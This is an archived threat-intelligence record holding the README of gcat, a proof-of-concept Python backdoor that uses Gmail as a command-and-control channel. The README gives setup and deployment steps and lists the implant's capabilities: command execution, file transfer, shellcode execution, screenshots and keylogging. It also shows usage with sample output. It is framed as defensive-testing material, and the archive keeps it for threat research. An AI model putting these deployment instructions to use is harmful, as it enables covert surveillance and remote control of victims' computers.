{
	"id": "bf8548e5-537b-4342-babd-c6ce177bb0fd",
	"created_at": "2026-04-06T00:16:50.316324Z",
	"updated_at": "2026-04-10T03:20:17.543464Z",
	"deleted_at": null,
	"sha1_hash": "6f34d8993acb6cc5c737f3b0c1017b3c510da7bf",
	"title": "GitHub - byt3bl33d3r/gcat: A PoC backdoor that uses Gmail as a C\u0026C server",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 57551,
	"plain_text": "GitHub - byt3bl33d3r/gcat: A PoC backdoor that uses Gmail as a\r\nC\u0026C server\r\nBy byt3bl33d3r\r\nArchived: 2026-04-05 19:39:21 UTC\r\nA stealthy Python based backdoor that uses Gmail as a command and control server\r\nThis project was inspired by the original PoC code from Benjamin Donnelly\r\nThis is PoC code...\r\n... that was released for orginazations to test their defenses against these type of attacks. In order to detect them see\r\nprojects like RITA.\r\nFor a more up to date and maintained version of this project see GDog\r\nSetup\r\nFor this to work you need:\r\nA Gmail account (Use a dedicated account! Do not use your personal one!)\r\nTurn on \"Allow less secure apps\" under the security settings of the account\r\nYou may also have to enable IMAP in the account settings\r\nThis repo contains two files:\r\ngcat.py a script that's used to enumerate and issue commands to available clients\r\nimplant.py the actual backdoor to deploy\r\nIn both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you\r\npreviously setup.\r\nYou're probably going to want to compile implant.py into an executable using Pyinstaller\r\nNote: It's recommended you compile implant.py using a 32bit Python installation\r\nUsage\r\n dP\r\n 88\r\n .d8888b. .d8888b. .d8888b. d8888P\r\n 88' `88 88' `\"\" 88' `88 88\r\n 88. .88 88. ... 88. .88 88\r\nhttps://github.com/byt3bl33d3r/gcat\r\nPage 1 of 4\n\n`8888P88 `88888P' `88888P8 dP\r\n .88\r\n d8888P\r\n \r\n .__....._ _.....__,\r\n .\": o :': ;': o :\".\r\n `. `-' .'. .'. `-' .'\r\n `---' `---'\r\n _...----... ... ... ...----..._\r\n .-'__..-''---- `. `\"` .' ----'''-..__`-.\r\n '.-' _.--''' `-._.-' ''''--._ `-.`\r\n ' .-\"' : `\"-. `\r\n ' `. _.'\"'._ .' `\r\n `. ,.-'\" \"'-., .'\r\n `. .'\r\n jgs `-._ _.-'\r\n `\"'--...___...--'\"`\r\n ...IM IN YUR COMPUTERZ...\r\n WATCHIN YUR SCREENZ\r\noptional arguments:\r\n -h, --help show this help message and exit\r\n -v, --version show program's version number and exit\r\n -id ID Client to target\r\n -jobid JOBID Job id to retrieve\r\n -list List available clients\r\n -info Retrieve info on specified client\r\nCommands:\r\n Commands to execute on an implant\r\n -cmd CMD Execute a system command\r\n -download PATH Download a file from a clients system\r\n -upload SRC DST Upload a file to the clients system\r\n -exec-shellcode FILE Execute supplied shellcode on a client\r\n -screenshot Take a screenshot\r\n -lock-screen Lock the clients screen\r\n -force-checkin Force a check in\r\n -start-keylogger Start keylogger\r\n -stop-keylogger Stop keylogger\r\nhttps://github.com/byt3bl33d3r/gcat\r\nPage 2 of 4\n\nMeow!\r\nOnce you've deployed the backdoor on a couple of systems, you can check available clients using the list\r\ncommand:\r\n#~ python gcat.py -list\r\nf964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86\r\n90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86\r\nThe output is a UUID string that uniquely identifies the system and the OS the implant is running on\r\nLet's issue a command to an implant:\r\n#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'\r\n[*] Command sent successfully with jobid: SH3C4gv\r\nHere we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all , the script then outputs\r\nthe jobid that we can use to retrieve the output of that command\r\nLets get the results!\r\n#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv\r\nDATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'\r\nJOBID: SH3C4gv\r\nFG WINDOW: 'Command Prompt - C:\\Python27\\python.exe implant.py'\r\nCMD: 'ipconfig /all'\r\nWindows IP Configuration\r\n Host Name . . . . . . . . . . . . : unknown-2d44b52\r\n Primary Dns Suffix . . . . . . . :\r\n Node Type . . . . . . . . . . . . : Unknown\r\n IP Routing Enabled. . . . . . . . : No\r\n WINS Proxy Enabled. . . . . . . . : No\r\n-- SNIP --\r\nThat's the gist of it! But you can do much more as you can see from the usage of the script! ;)\r\nTo Do\r\nMulti-platform support\r\nCommand to upload files\r\nhttps://github.com/byt3bl33d3r/gcat\r\nPage 3 of 4\n\nTransport crypto \u0026 obfuscation\r\nSource: https://github.com/byt3bl33d3r/gcat\r\nhttps://github.com/byt3bl33d3r/gcat\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/byt3bl33d3r/gcat"
	],
	"report_names": [
		"gcat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434610,
	"ts_updated_at": 1775791217,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f34d8993acb6cc5c737f3b0c1017b3c510da7bf.pdf",
		"text": "https://archive.orkl.eu/6f34d8993acb6cc5c737f3b0c1017b3c510da7bf.txt",
		"img": "https://archive.orkl.eu/6f34d8993acb6cc5c737f3b0c1017b3c510da7bf.jpg"
	}
}